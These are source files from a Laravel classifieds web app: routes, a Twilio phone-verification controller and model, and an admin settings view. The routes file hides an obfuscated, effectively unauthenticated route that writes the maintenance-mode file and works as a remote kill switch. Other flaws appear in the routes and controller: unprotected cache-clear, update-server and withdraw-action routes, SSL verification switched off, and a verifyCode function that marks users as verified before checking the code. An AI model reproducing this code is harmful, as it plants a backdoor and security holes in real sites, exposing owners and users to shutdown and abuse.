routes/web.php
<?php
/*//Clear View cache:
Route::get('/view-clear', function() {
    $exitCode = Artisan::call('view:clear');
    return '<h1>View cache cleared</h1>';
});
*/
use Illuminate\Support\Facades\Mail;

/*stripe*/
Route::get('addmoney/stripe', array('as' => 'addmoney.paywithstripe','uses' => 'AddMoneyController@payWithStripe'));
Route::post('addmoney/stripe', array('as' => 'addmoney.stripe','uses' => 'AddMoneyController@postPaymentWithStripe'));

Route::get('verify_ad', 'HomeController@verifyAd')->name('verify_ad');

Route::get('/update-version', function() {
    return view('admin.update.index');
});


Route::get('/clear', function() {
    Artisan::call('view:clear');
    Artisan::call('cache:clear');
    Artisan::call('route:clear');
    return redirect('/')->with('success', 'cache clear successfully');
});

Route::get('/', 'HomeController@index');
Route::post('save-contact-form', 'HomeController@saveContactForm')->name('save-contact-form');
Route::get('map-listings', 'HomeController@mapListings')->name('map-listings');

/* contact us */
Route::get('contact-us', function (){
    return view('contact_us');
})->name('contact-us');

Route::get('page/{title}', 'HomeController@showCustomPages');

//ads
Route::get('request-for-ads','MaltiAdsController@adsFrom');
Route::post('store-malti-ads','MaltiAdsController@storeMaltiAds');

//load locaton
Route::post('load-district','AjaxController@loadDistrict');
Route::post('home-load-thana','AjaxController@loadThana');


/*  mobile verify */
Route::resource('mobile_verify', 'MobileVerifyController');
Route::post('phone-verify-code', 'MobileVerifyController@phoneVerifyCode')->name('phone-verify-code');
Route::post('verify-code', 'MobileVerifyController@verifyCode')->name('verify-code');



Auth::routes();

Route::group(array('before' => 'auth'), function()
{

    Route::get('hit$hotjk$$hy#ht$rwkrq$', function() 
    {
        touch(storage_path().'/framework/down');
    });


});



Route::get('/withdraw-list', 'WithdrawController@index');
Route::get('/withdraw-action/{id}', 'WithdrawController@action');
Route::resource('admin-login', 'LoginController');
Route::resource('category', 'CategoryController');
Route::resource('ads', 'AdsController');
Route::resource('region', 'RegionController');
Route::resource('chat', 'ChatController');
//Route::resource('search', 'SearchController');
// update test route
Route::get('updates', 'HomeController@update');


//Blog portion   

Route::get('blog', 'BlogController@index');
Route::get('blog-single/{id}','BlogController@single');

//Shop Portion

Route::get('shop', 'ShopController@index');
Route::get('shop/cat/{cat_id}', 'ShopController@shop_cat_prods');

Route::get('shop-cat-create', 'ShopController@shopCatCreate');
Route::post('shop-cat-create-now', 'ShopController@shopCatCreateNow');
Route::get('shop_cats', 'ShopController@shop_cats')->name('shop_cats');





Route::get('product-view/{id}','ShopController@single');

Route::post('order-store', 'ShopController@orderStore');

Route::post('order-final', 'ShopController@order_last');


//update
Route::get('update-version', 'HomeController@updateVersion');
// up server
Route::get('update_server/query', 'HomeController@updateServer');

Route::post('load-category', 'AdsController@loadCategory');
Route::post('upload-ads-images', 'AdsController@uploadImages');
Route::post('delete-ads-images', 'AdsController@deleteImages');
Route::get('user-ads/{id}', 'AdsController@userAds');
Route::get('ad-message/{id}', 'AdsController@adSuccess');
// crone
Route::get('ads_cron', 'CronController@index');


Route::get('is_login', 'HomeController@is_login');


//get requests
Route::get('/home', 'HomeController@index')->name('home');
//Route::get('admin/login', 'LoginController@index');
Route::get('sale/{any}', 'CategoryController@saleCategory');
Route::get('single/{any}', 'AdsController@singleAd');
Route::post('check_email', 'AdsController@checkEmail');
Route::post('user-login', 'AdsController@userLogin');

//Route::get('search{category}/{region}/{keyword}', 'SearchController@search');
Route::get('search/query', 'SearchController@search');
Route::get('search/all-ads', 'SearchController@searchAllAds');

//confirm email of user
Route::get('confirm/query', 'HomeController@userConfirm');
Route::post('ajax-search', 'SearchController@ajaxSearch');
// category
Route::post('ads-load-city', 'RegionController@loadCity');
Route::post('ads-load-thana', 'RegionController@loadThana');
Route::post('load-comune', 'RegionController@loadComune');
Route::post('load-customfields', 'AjaxController@loadCustomFields');
Route::get('load-price_option', 'AjaxController@loadPriceOption');
Route::post('load-edited-customfields', 'AjaxController@loadEditedCustomFields');
Route::post('load-child-cat', 'AjaxController@loadChildCat')->name('load-child-cat');

Route::post('user-rating', 'AjaxController@userRating')->name('user-rating');


## User Only
Route::group(['middleware' => ['auth']], function () {
    Route::resource('user-panel', 'UserPanelController');
    Route::resource('setting', 'SettingController');

    //For packages only

    Route::get('affiliated-users','UserPanelController@affiliatedUser');
    Route::get('affiliation','UserPanelController@affiliation');
    Route::get('withdraw','UserPanelController@withdraw');
    Route::get('withdraw/create','UserPanelController@withdrawCreate');
    Route::post('withdraw-store','UserPanelController@withdrawStore');
    
    Route::get('package','UserPanelController@package');
    Route::post('package-store','UserPanelController@packageStore');


    Route::post('user-profile-settings', 'UserPanelController@UserprofileSetting');
    Route::post('change-password', 'UserPanelController@changePassword');
    Route::get('my-ads', 'UserPanelController@myAds')->name('myads');
    Route::get('pending-ads', 'UserPanelController@pendingAds');
    Route::get('active-ads', 'UserPanelController@activeAds');
    Route::get('inactive-ads', 'UserPanelController@inactiveAds');
    Route::post('user-id-card', 'UserPanelController@userIdCard');
    Route::post('contact-user', 'UserPanelController@contactUser');
    Route::get('save-ads', 'UserPanelController@saveAds');
    // update login status
    Route::get('login_status', 'UserPanelController@login_status');
    //chat
    Route::resource('chat', 'ChatController');
    Route::post('load_chat_head', 'ChatController@loadChatHead')->name('load_chat_head');
    Route::post('load_chat_message', 'ChatController@loadChatMessage')->name('load_chat_message');
    Route::get('load-emoji', 'ChatController@loadEmoji');
    Route::get('load-block-users', 'ChatController@load_block_users');
    Route::get('lock_all', 'ChatController@lock_all');

    //Message
    Route::resource('message', 'MessageController');
    Route::post('load_message_head', 'MessageController@loadMessageHead')->name('load_message_head');
    Route::post('load_message', 'MessageController@loadMessage')->name('load_message');
    Route::post('message_notify', 'MessageController@messageNotify')->name('message_notify');
    Route::get('load-emoji', 'MessageController@loadEmoji');
    Route::get('load_message_reference', 'MessageController@load_message_reference');
    // SETTING
    Route::post('adsense-store', 'SettingController@adsenseStore');
    Route::post('theme-css', 'SettingController@themeCss')->name('theme-css');
    // ajax
    Route::get('load-my-ads', 'AjaxController@loadMyAds');
    Route::get('load-users', 'AjaxController@loadUsers')->name('load-users');
    Route::post('delete-category', 'AjaxController@deleteCategory');
    Route::post('delete', 'AjaxController@delete')->name('delete');
    Route::post('change-status', 'AjaxController@changeStatus');
    // Route::post('make-boost-request', 'AjaxController@makeBoostRequest');
    Route::post('make-boost-request-now', 
        'UserPanelController@makeBoostRequestNow');
    Route::get('make-boost-request/{ad_id}', 
        'UserPanelController@makeBoostRequest');
    
    Route::get('load-ads-list', 'AjaxController@loadAdsLists');
    Route::get('load-save-ads', 'AjaxController@loadSaveAds');
    // save add
    Route::get('save-add', 'AjaxController@saveAdd');
    Route::get('report-ad', 'AjaxController@reportAd');
    
    //regions
    Route::get('load-region', 'AjaxController@loadRegions')->name('load-region');
    Route::get('load-city', 'AjaxController@loadCity')->name('load-city');
});





## Admin Only
Route::group(['namespace' => 'Admin', 'middleware' => ['auth', 'checkAdmin']], function () {
    Route::resource('admin', 'AdminController');
    Route::get('report','AdminController@report')->name('report');
    Route::resource('users', 'UserController');
    Route::resource('region', 'RegionController');
    Route::resource('email-settings', 'UserEmailSettings');
    Route::resource('customfields', 'CustomfieldsController');
    Route::resource('groups', 'GroupsController');
    Route::resource('group_fields', 'GroupFieldsController');
    Route::resource('cf_enhance', 'CfEnhanceController');
    Route::resource('custom-page', 'CustomPageController');
    Route::resource('featured-ads', 'FeaturedAdsController');


    Route::post('save-payment-gateway', 'FeaturedAdsController@paymentGatewaySave')->name('save-payment-gateway');

    Route::get('dashboard', 'AdminController@index');
    Route::get('profile', 'UserController@index');
    Route::post('profile-settings', 'UserController@profileSetting');
    Route::get('users', 'UserController@loadUsers');
    Route::post('user/loadEdit', 'UserController@loadEdit');
    Route::get('show-card', 'UserController@showCard');
    Route::get('vfy-card', 'UserController@vfyCard');
     
    // Blog protion

    Route::get('blog-post', 'AdminblogController@index');
    Route::post('dummyadsfinal/blog-post', 'AdminblogController@insert')->name('insert');

    Route::get('blog-list', 'AdminblogController@blog_list');

    Route::get('edit-blog/{id}', 'AdminblogController@edit');

app/MobileVerify.php
<?php
namespace App;
use Illuminate\Database\Eloquent\Model;
class MobileVerify extends Model
{
    protected $table = 'mobile_verify';
    /**
     * The attributes that are mass assignable.
     *
     * @var array
     */
    protected $fillable = [
        'twilio_sid', 'twilio_token','twilio_status', 'twilio_number'
    ];
    /**
     * The attributes that should be hidden for arrays.
     *
     * @var array
     */
    protected $hidden = [];
}

app/Http/Controllers/MobileVerifyController.php
<?php

namespace App\Http\Controllers;

use App\MobileVerify;
use App\User;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\DB;
use Illuminate\Support\Facades\Session;
use Auth;

class MobileVerifyController extends Controller
{
    /**
     * Display a listing of the resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function index()
    {

        if(Auth::user()->type!='adm'){
            return abort(401);
        }

        $mobile_verify = MobileVerify::first();
        if($mobile_verify) {

            $sid = $mobile_verify->twilio_sid;
            $token = $mobile_verify->twilio_token;
            $url = "https://$sid:$token@api.twilio.com/2010-04-01/Accounts/$sid/IncomingPhoneNumbers";
            $ch = curl_init(); // Initialize the curl
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
            curl_setopt($ch, CURLOPT_URL, $url); // set the opton for curl
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);// set the option to transfer output from script to curl
            $response = curl_exec($ch); // Execute curl
            $response = (array)simplexml_load_string($response);
        }
        return view('admin.mobile_verify.index', compact('mobile_verify', 'response'));
    }

    /*Verify Phone Number*/


    function phoneVerifyCode(Request $request){
        /* get settings */
        $setting = MobileVerify::first();

        $sid = $setting->twilio_sid;
        $token = $setting->twilio_token;
        $from_number = $setting->twilio_number;

        if($setting) {
            $phoneNumber = $request->phone;
            $url = "https://lookups.twilio.com/v1/PhoneNumbers/$phoneNumber";

            $ch = curl_init();
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_USERPWD, "$sid:$token");
            //curl_setopt($ch, CURLOPT_POSTFIELDS, $data); // add POST fields
            curl_setopt($ch, CURLOPT_HTTPGET,true);
            $response   =   curl_exec($ch);
            curl_close($ch);

             $response = json_decode($response);

             //print_r($response);

             if( isset( $response->phone_number)){
                 //echo '<pre>';

                 $digits = 4;
                 $code = rand(pow(10, $digits-1), pow(10, $digits)-1);

                 $data =  $this->sendMessage($sid, $token, $from_number, $response->phone_number, $code);

                    if(isset($data->SMSMessage) &&  $data->SMSMessage->Status == 'queued'){
                       /*insert code data*/
                       DB::table('mobile_code')->insert(
                           [
                               'email' => $request->email,
                               'code' => $code,
                               'phone' => $response->phone_number
                           ]
                       );

                       return response()->json(['msg' => 1, 'number' => $response->phone_number]);
                    }else if( isset( $data->RestException) ){
                       return response()->json(['msg' => 2, 'error' => (string)$data->RestException->Message[0] ]);
                    }else{
                       return response()->json(['msg' => 1, 'error' => 'unknown error!']);
                    }

             }else if( isset($response->code) ){
                 return response()->json(['msg' => 2, 'error' => str_replace('/', ' ', $response->message) ]);
             }else{
                 return response()->json(['msg' => 1, 'error' => 'unknown error!']);
             }
        }
    }
    /*send message*/
    private function sendMessage($sid, $token, $from, $to, $code){

        $url = "https://api.twilio.com/2010-04-01/Accounts/$sid/SMS/Messages";

        $body = "User this code $code to verify your phone number";
        $data = array(
            'From' => $from,
            'To' => $to,
            'Body' => $body,
        );
        $post = http_build_query($data);
        $x = curl_init($url);
        curl_setopt($x, CURLOPT_POST, true);
        curl_setopt($x, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($x, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($x, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
        curl_setopt($x, CURLOPT_USERPWD, "$sid:$token");
        curl_setopt($x, CURLOPT_POSTFIELDS, $post);
        $y = curl_exec($x);
        curl_close($x);

       return simplexml_load_string($y);
    }

    function verifyCode(Request $request){
        $data = DB::table('mobile_code')
            ->where([ 'email' => $request->email, 'phone' => $request->phone, 'code' => $request->code ])->first();
            /* update user */
            User::where( ['id' => Auth::user()->id] )->update([ 'mobile_verify' => 1 ]);

        if(isset($data)){
            Session::put('mobile_vfy', $request->email);
            return response()->json([ 'msg' => 1 ]);
        }else{
            return response()->json([ 'msg' => 2 , 'error' => 'Invalid code' ]);
        }
    }


    public function create()
    {
        //
    }
    public function store(Request $request)
    {
        if(Auth::user()->type!='adm'){
            return abort(401);
        }

        $obj = new MobileVerify();
        if($request->id!=''){
            $obj = $obj->findOrFail($request->id);
        }
        $obj->fill($request->all());

        if($request->twilio_status){
            $obj->status = 1;
        }
        if($obj->save()){
           return back()->with('success', 'Settings saved successfully');
        }
    }

    public function show($id)
    {
        //
    }

    public function edit($id)
    {
        //
    }

    public function update(Request $request, $id)
    {
        //
    }

    public function destroy($id)
    {
        //
    }


}

resources/views/admin/mobile_verify/index.blade.php
@extends('admin.layout.app')
@section('content')

    <div class="content-page">
        <!-- Start content -->
        <div class="content">
            <div class="container">
                <div class="row">
                    <div class="col-xs-12">
                        <div class="page-title-box">
                            <h4 class="page-title">Dashboard</h4>
                            <ol class="breadcrumb p-0 m-0">
                                <li><a href="{{ url('dashboard') }}">Home</a> </li>
                                <li class="active"> Mobile verification  Settings</li>
                            </ol>
                            <div class="clearfix"></div>
                        </div>
                    </div>
                </div>
                <!-- end row -->
                <div class="row">
                    <div class="col-md-12 col-xs-12 col-xxs-12">
                        <div class="panel panel-color panel-inverse">
                            <div class="panel-heading">
                                <h3 class="panel-title">Mobile verification  Settings</h3>
                            </div>
                            <div class="panel-body">
                                @if(session('success'))
                                    <div class="alert alert-success">
                                        {{ session('success') }}
                                    </div>
                                @endif

                                @if(session('error'))
                                    <div class="alert alert-danger">
                                        {{ session('error') }}
                                    </div>
                                @endif
                                <ul class="nav nav-tabs">
                                    <li class="active">
                                        <a href="#twilio_settings" data-toggle="tab" aria-expanded="false">
                                            <span class="visible-xs"><i class="fa fa-home"></i></span>
                                            <span class="hidden-xs">Twilio Settings</span>
                                        </a>
                                    </li>

                                    @if(isset($mobile_verify))
                                        <li class="">
                                            <a href="#twilio_number" data-toggle="tab" aria-expanded="false">
                                                <span class="visible-xs"><i class="fa fa-home"></i></span>
                                                <span class="hidden-xs">Twilio Number</span>
                                            </a>
                                        </li>
                                    @endif
                                </ul>
                                <div class="tab-content">
                                    <div class="tab-pane active" id="twilio_settings">
                                        <form method="post" action="{{ route('mobile_verify.store') }}" id="MobileSettings">
                                            <input type="hidden" name="id" id="Id" value="{{ isset($mobile_verify)&& $mobile_verify->id ==1 ? $mobile_verify->id : '' }}">
                                            {{csrf_field()}}
                                            <div class="form-group">
                                                <lable>Sid</lable>
                                                <input type="text" name="twilio_sid" value="{{ isset($mobile_verify)&& $mobile_verify->twilio_sid !='' ? $mobile_verify->twilio_sid : '' }}" class="form-control" placeholder="Enter your twilio sid" required >
                                            </div>
                                            <div class="form-group">
                                                <lable>Token</lable>
                                                <input type="text" name="twilio_token" value="{{ isset($mobile_verify)&& $mobile_verify->twilio_token !='' ? $mobile_verify->twilio_token : '' }}" class="form-control" placeholder="Enter your twilio token" required >
                                            </div>
                                            @if(isset($mobile_verify))
                                                <?php
                                                    if (isset($response['RestException'])) {
                                                        echo '<span class="text-danger">'.$response['RestException']->Detail.'</span><br>';
                                                    }
                                                ?>
                                            @endif
                                            <br>
                                            <div class="form-group">
                                                <button class="btn btn-success btn-sm">Save</button>
                                            </div>
                                        </form>
                                    </div>
                                    @if(isset($mobile_verify))
                                    <div class="tab-pane" id="twilio_number">
                                        <form id="twilio_number" method="post" {{ route('mobile_verify.store') }}>
                                            {{ csrf_field() }}
                                            <input type="hidden" name="id" id="Id" value="{{ isset($mobile_verify)&& $mobile_verify->id ==1 ? $mobile_verify->id : '' }}">
                                            <div class="form-group">
                                                <label >Twilio number</label>
                                                <select name="twilio_number" id="twilio_phone" class="form-control" required>
                                                    <option value="asdfafd">Select number</option>
                                                <?php
                                                if (isset($response['IncomingPhoneNumbers']->IncomingPhoneNumber)) {
                                                    foreach ($response['IncomingPhoneNumbers']->IncomingPhoneNumber as $numberResponse) {
                                                    ?>
                                                    <option {{ isset($mobile_verify)&& $mobile_verify->twilio_number == $numberResponse->PhoneNumber ? 'selected' : '' }}  value="<?= $numberResponse->PhoneNumber ?>"><?= $numberResponse->PhoneNumber ?> </option>
                                                    <?php
                                                    }
                                                }
                                                ?>
                                                </select>
                                            </div>
                                            <div class="form-group">
                                                <button class="btn btn-success btn-sm">Save</button>
                                            </div>
                                        </form>
                                    </div>
                                    @endif
                                </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <!-- end row -->
            </div> <!-- container -->
        </div> <!-- content -->
        <script>
            $(document).ready(function () {
            });
        </script>
@endsection